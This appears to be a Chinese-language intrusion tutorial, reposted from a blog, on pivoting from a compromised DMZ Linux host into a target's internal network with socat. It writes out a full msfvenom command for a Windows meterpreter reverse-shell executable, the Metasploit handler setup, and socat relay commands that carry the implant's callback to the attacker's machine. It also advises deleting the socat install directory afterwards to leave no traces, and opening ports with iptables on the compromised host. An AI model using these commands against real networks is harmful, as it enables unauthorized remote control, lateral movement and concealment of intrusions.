假设其公网ip为 192.168.3.30
假设其内网ip为 192.168.32.167
1
2
win7 假设为目标内网机器
假设其内网ip为 192.168.32.144
1
2
本地机器
假设本地内网ip为 192.168.3.15
0x02 需要注意的一些前提条件
1
本地机器能ping通lnmp01,lnmp01和目标内网中的win7能互通
0x03 最终目的,实现双内网通信,即在我自己的内网中操作目标内网中的机器,当然,实现双内网通信的方式还有非常多,比如常用的几种方法:
1
2
3
4
5
6
最传统的是通过在vps利用lcx listen做转发,然后再在本地bind上去
另外,还是通过vps搭建vpn,本地先连到vpn内网中,再在vps上用lcx tran通过vpn内网转发到本地
还有,利用meterpreter自带的端口转发功能,当然啦,那个是通过meterpreter隧道自己来实现的,也就是说你要先把meterpreter的shell先弹回来,因为这个并非今天重点,暂不多做介绍,有兴趣可自行深度挖掘研究
再有,在一些高级点的马中也自带了各种内网代理功能....
最后,就是接下来咱们要详细说明的这种,利用socat和目标DMZ建立双向通道,然后带出目标内网中所有机器的流量
......
0x04 大概实现思路:
1
DMZ机器作为代理 -> 将马的流量全部转到DMZ机器的指定端口上 -> 再在本地与代理端转出的端口建立双向通道 -> 本地只需要监听转过来的马的流量 -> 成功上线
0x05 先在 lnmp01 安装好socat,实战中推荐用编译安装,走的时候直接一并把整个安装目录干掉,干净:
1
# yum install socat -y
0x06 本地准备好reverse的 payload,注意,这里的反连ip,要写目标边界DMZ的那台机器[即lnmp01]的ip:
1
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.30 LPORT=443 -f exe -o /root/shell.exe
0x07 本地开始执行监听:
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.3.15
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit -j
0x08 在 lnmp01 上执行代理操作,意思比较简单,就是将本地的53和443端口进行绑定,相当于在本机建立一条管道,其实本机就是个中介,当有人访问本机的53端口,它就会把数据自动丢到本机的443端口上去,而443正好是我马的端口,这样,自然就造成了上线的效果:
1
# nohup socat tcp-listen:53 tcp-listen:443
0x09 此时,再回到本地和proxy端建立双向通道,最好在后台一直挂着,意思就是将本地的443端口和proxy端的53端口进行绑定,这样,当你访问本地的443其实就相当于访问proxy端的53端口,而proxy端的端口又和它本地的443端口进行了绑定,所以当马的443端口流量弹回来的时候就相当于直接弹到我本地:
1
# nohup socat tcp:192.168.3.30:53 tcp:192.168.3.15:443
0x10 最后在内网机器上执行payload,马成功上线
0x11 关于socat:
1
2
3
一款linux自带的高级端口转发工具,支持n多协议,基本上可以秒掉现在市面上已知的各类端口转发工具
当然,它绝非仅仅端口转发这么点功用,比如,建立各种隧道等等...
因为并非今天重点,这里不做过多说明,后续有空会详细说明
0x12 优点:
1
2
3
4
不再需要在vps上做转发
只需要一台边界机器即可让内网所有机器上线
稳定,socat属于系统自带工具,使用简单方便,较适合内网渗透
....
0x13 缺点:

1
2
防火墙阻断对指定端口的访问,说实话,如果你已经拿到目标机器权限,用iptables开两个端口还是比较容易的,就怕其他的一些乱七八糟的防护
如果实在端口出不来,就只能通过各种复用,或者利用更底层的协议隧道来搞,如,icmp,udp隧道...
------------
还有ncat/netcat
--------

相关帖子:
https://briteming.blogspot.com/2013/04/ipport-forwarding.html
https://briteming.blogspot.com/2013/03/linux-vpssocatvps.html
https://briteming.blogspot.com/2013/07/linuxwebvpn.html